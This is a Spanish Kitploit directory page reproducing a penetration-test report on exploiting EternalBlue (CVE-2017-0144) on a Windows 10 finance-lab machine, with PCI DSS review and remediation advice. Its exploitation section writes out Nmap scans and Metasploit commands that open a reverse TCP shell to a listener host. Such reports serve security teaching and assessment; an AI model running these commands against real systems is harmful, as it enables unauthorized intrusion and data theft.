Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint — Este informe describe un compromiso VAPT estructurado centrado en el cumplimiento de PCI DSS, la enumeración del servicio SMB y la explotación de CVE-2017-0144 (EternalBlue) en una máquina con Windows 10 dentro de una infraestructura orientada a finanzas. | Kitploit
Herramientas/GitHubGitHub/adityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint
ReconocimientoAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónAprendizaje y Educación
GitHubadityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint

VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint

Este informe describe un compromiso VAPT estructurado centrado en el cumplimiento de PCI DSS, la enumeración del servicio SMB y la explotación de CVE-2017-0144 (EternalBlue) en una máquina con Windows 10 dentro de una infraestructura orientada a finanzas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
15hace 1 añoAún no revisado

Informe de VAPT sobre Explotación de SMB en un Endpoint Financiero con Windows 10

Este informe describe un compromiso estructurado de VAPT centrado en el cumplimiento de PCI DSS, la enumeración del servicio SMB y la explotación de CVE-2017-0144 (EternalBlue) en una máquina Windows 10 dentro de una infraestructura orientada a finanzas.


🔐 Introducción

Las instituciones financieras se enfrentan a algunos de los requisitos de cumplimiento más estrictos en el ámbito de la ciberseguridad. Con datos sensibles de clientes e información de titulares de tarjetas en juego, las configuraciones de seguridad incorrectas pueden provocar violaciones catastróficas. Esta simulación de VAPT se llevó a cabo para evaluar la postura de seguridad de un sistema endpoint basado en Windows 10 desde la perspectiva del cumplimiento de PCI DSS, al mismo tiempo que se identificaban y explotaban vulnerabilidades conocidas en los servicios SMB expuestos.

La simulación abarca múltiples etapas, desde el reconocimiento y el escaneo de vulnerabilidades con Nessus hasta la explotación en el mundo real mediante Metasploit. El informe enfatiza aún más la importancia del fortalecimiento de endpoints, la gestión de parches, la aplicación de firewalls y la alineación con PCI DSS para mantener la integridad de las redes financieras.

Aditya Bhatt


Informe de Evaluación de Vulnerabilidades y Pruebas de Penetración (VAPT)

Objetivo: Host Windows 10 – Endpoint del Sector Financiero

Preparado por: Aditya Bhatt
Cargo: Analista VAPT | Profesional de Ciberseguridad
Contacto: [email protected] | +91-9818993884


Resumen Ejecutivo

Este informe presenta los resultados de una prueba de penetración realizada en un endpoint Windows 10 que se sospecha maneja datos financieros y transacciones con tarjetas de crédito. El objetivo era validar las implementaciones de controles PCI DSS e identificar posibles vectores de ataque que podrían comprometer los datos de los titulares de tarjetas.

Usando Nessus, se descubrió que el host era vulnerable a CVE-2017-0144 (EternalBlue) —una vulnerabilidad crítica de SMB. Luego se utilizó el framework Metasploit para explotar esta falla y obtener acceso remoto no autorizado a un shell. Este informe destaca la importancia de una gestión oportuna de parches y el fortalecimiento de los servicios de red para evitar violaciones de datos en sistemas financieros.


Objetivos

  • Evaluar el cumplimiento de los requisitos de PCI DSS en un endpoint objetivo.
  • Enumerar e identificar vulnerabilidades en un sistema Windows 10.
  • Explotar las vulnerabilidades descubiertas utilizando herramientas y técnicas estándar.
  • Recomendar acciones de remediación para mejorar la seguridad y el cumplimiento del sistema.

Metodología

Tarea 1: Evaluación de Cumplimiento de PCI DSS

Se revisaron seis objetivos principales y doce requisitos de PCI DSS. Los principios clave incluyen:

  • Implementar firewalls y cambiar las configuraciones predeterminadas del proveedor
  • Cifrar los datos de los titulares de tarjetas durante el almacenamiento y la transmisión
  • Utilizar antivirus, configuraciones seguras y gestión de parches
  • Aplicar controles de acceso y mecanismos de autenticación
  • Monitorear, registrar y realizar escaneos regulares de vulnerabilidades
  • Crear y hacer cumplir una política de seguridad en toda la organización

Tarea 2: Descubrimiento de Vulnerabilidades

Sistema Objetivo:

  • Máquina virtual Windows 10
  • Dirección IP: 10.10.195.105
  • Subred: 255.0.0.0

Herramientas Utilizadas:

  • Nmap para descubrimiento de puertos y servicios
  • Nessus para escaneo de vulnerabilidades
  • Metasploit para explotación

Comandos Clave:

root@kitploit:~
nmap -sn 10.10.195.105

5

root@kitploit:~
nmap -sV -p445 10.10.195.105

6

root@kitploit:~
nmap -F 10.10.195.105

1

  • Puerto 445 (SMB) encontrado abierto
  • Nessus identificó la vulnerabilidad: CVE-2017-0144 (EternalBlue)

2 png
3
4


Tarea 3: Explotación

Escáner:

Intentando Escaneo con Nessus:

7
8
9
10
11
12
13
14
15

Intentando Escaneo con Metasploit:

root@kitploit:~
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run

16
17

Módulo de Explotación:

root@kitploit:~
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit

18
19
20

  • Resultado: Shell remoto abierto exitosamente en la máquina Windows 10 objetivo
  • Acceso no autorizado al sistema sensible confirmado

Hallazgos Clave

  • SMBv1 activo y expuesto a la red
  • EternalBlue (MS17-010) sin parche y explotable
  • El escaneo de Nessus reveló múltiples vulnerabilidades de alta gravedad
  • Sin firewall ni segmentación de red que impidan el movimiento lateral
  • Servicios de red predeterminados innecesariamente abiertos

Análisis de Riesgos


Recomendaciones

  1. Gestión de Parches

    • Aplicar inmediatamente la actualización de seguridad de Microsoft para CVE-2017-0144
    • Implementar escaneo continuo de vulnerabilidades y ciclos de parches
  2. Fortalecimiento de la Red

    • Deshabilitar completamente el protocolo SMBv1
    • Limitar el acceso al servicio SMB solo a redes internas y de confianza
  3. Aplicación del Firewall

    • Bloquear el puerto 445 en interfaces públicas
    • Usar IPS/IDS para detectar ataques basados en SMB en tiempo real
  4. Monitoreo Continuo

    • Implementar herramientas SIEM para detectar anomalías y correlacionar eventos
    • Programar escaneos frecuentes con Nessus para evaluar nuevos riesgos
  5. Cumplimiento de PCI DSS

    • Aplicar autenticación multifactor y acceso con privilegios mínimos
    • Cifrar todos los datos de titulares de tarjetas en tránsito y en reposo
    • Realizar auditorías periódicas para garantizar la cobertura total de los controles
  6. Capacitación en Concienciación

    • Realizar sesiones de capacitación periódicas para equipos de TI y partes interesadas
    • Incluir el manejo seguro de datos financieros y procedimientos de respuesta a vulnerabilidades

Conclusión

Este compromiso demostró claramente que servicios no parcheados y obsoletos como SMBv1 pueden llevar a un compromiso completo del sistema utilizando exploits públicos conocidos. La vulnerabilidad EternalBlue explotada aquí es un ejemplo clásico de por qué la aplicación oportuna de parches, la minimización de servicios y el escaneo proactivo son elementos no negociables en la infraestructura financiera.

Sin el cumplimiento de marcos como PCI DSS, las organizaciones corren el riesgo tanto de sanciones legales como de violaciones de datos devastadoras.


🛡️ Reflexiones Finales

Las brechas de seguridad a menudo se esconden detrás de protocolos heredados y parches olvidados. Este compromiso reafirmó la importancia de tratar cada servicio—especialmente aquellos como SMB—no como una conveniencia, sino como una superficie de riesgo.

Una ciberseguridad sólida en el sector financiero comienza con una vigilancia continua, políticas aplicadas y una gestión de parches sin concesiones.

Gracias por leer este informe. Espero que haya ofrecido claridad, información práctica y un refuerzo de por qué la validación continua de seguridad es esencial, especialmente cuando se manejan datos financieros.

– Aditya Bhatt
Analista VAPT | Profesional de Ciberseguridad


Descargar herramienta
Descripción del RiesgoImpactoProbabilidadPuntuación de Riesgo
Explotación de EternalBlue (SMBv1)AltoAltaCrítico
Falta de Gestión de ParchesAltoMediaAlto
Ausencia de Controles de Acceso a la RedMedioAltaAlto
Incumplimiento de PCI DSSAltoAltaCrítico